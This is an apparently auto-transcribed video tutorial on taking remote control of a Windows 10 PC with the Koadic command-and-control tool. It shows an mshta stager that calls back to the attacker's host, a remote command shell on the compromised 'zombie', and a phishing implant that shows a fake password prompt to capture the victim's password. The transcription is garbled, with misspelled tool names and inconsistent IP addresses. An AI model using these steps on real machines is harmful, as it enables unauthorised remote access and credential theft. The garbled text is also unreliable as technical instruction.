Remotely Control Any PC With This Simple Tool!
as you're running through your penetration testing you're doing your adequate hacking hopefully it's adequal you may find out that some features and services are just not there in the Target operating system and it's very important for you to think about what

as you're running through your
penetration testing you're doing your
adequate hacking hopefully it's adequal
you may find out that some features and
services are just not there in the
Target operating system and it's very
important for you to think about what
are those services or features that come
out of the box with the operating system
say the Windows computer then you can
take advantage of as part of remotely
controlling the target machine so right
in front of us we are on a Windows 10
computer and in some cases if you go
into say command prompt that could be
cases where you do not have curl and
Summit version has it some of it doesn't
if I do the blue Gat or if I was to do
something like netcat or NC and again
some of these very useful services or
features are just not available out of
the box as compared to maybe other
operating system so with that we have to
think about what are some of the
features that come off the box together
with the operating system that we can
take advantage of in order to remotely
control the computer
foreign
over into article hacking box here on
Kyle Linux we can use a tool that can
help us remotely command and control all
this operating systems using coatic so
we can use Ms HTA as part of that so you
can see the following the major
differences at coetic thus most of its
operations using Windows script hosts
okay so this is going to be compatible
with a lot of all this Windows operating
system so go ahead and open up terminal
and all you can do right now is enter
coated you can enter in debt and that's
it we have now started our com command
and control so this is a Windows post
exploitation tool yes I know but it can
be used again for remotely controlling
all these computers so as a start we can
use Stager so enter use Stager Follow by
slash JS and I followed by Ms HTA heat
and throwing that that's it done enter
info and you get more information about
how you're hosting this Stager so you
can see the following with s r v host
192.168.0.104 4 so this is the IP
address of the attackus machine okay so
you can see right here
182168.0.104 and jumping bag over here
we have the port of 9999 and the
endpoint of jlt om okay so that's it all
you got to do now is enter run and
that's you get the following enter this
instruction right here into any of the
target computer and you'll be done
you'll be able to remotely control the
machine so what you got to do now
head over to the Target machine and I've
now jumped back over into Target machine
on Windows computer and we're entering
mshta followed by the HTTP
102.168.0.104 Port 999 jlton go hit and
hit enter on that
foreign
X you can see the full link right here
zombie zero desktop 972
Windows 10 Pro so if I go ahead and
enter zombies I can see the following
here so we have ID 0 or you can see
192.168.0.187 and what I can do now is
go ahead and interact with it by
entering CMD shell and then follow up by
zero of the ID and here we got it I can
enter the following now of ipconfig so
this ipconfig is available on the
Windows computer and you can see right
here we have the IP address of 102 168.0
to 197 I can enter vir
and we can see the following list of the
folders and the files within the
directory so we are literally in and we
can do a lot of things as part of
tacking the computer what we can do now
is use some of the modules that's
directly available from coavig to help
us do some of this post exploitation
work and one of that is called implant
all right so this use implant followed
by slash fish and followed by slash
password underscore box so this will do
a password pop-up for us and I can enter
the following of info and I can set the
zombie to number zero so this is the
target zombie that we have now and all I
got to do is enter run now if I hit back
over into the Windows computer right
here you can see the following all right
you must enter your password to continue
I enter my password of Heckler Loy is
very handsome all right and I click OK
that's it done and the other beautiful
thing is that even if it close off the
command prompt I continue to have remote
control of the target machine so that's
beautiful so if head back over to Kyle
Linux right now you can see right here
we've got hackalow is very handsome wait
what you haven't used hacker along as
very handsome as your password are you
kidding me change it right now go over
to Gmail Hotmail Facebook whatever
accounts you have change all of your
passwords to hack along with your hands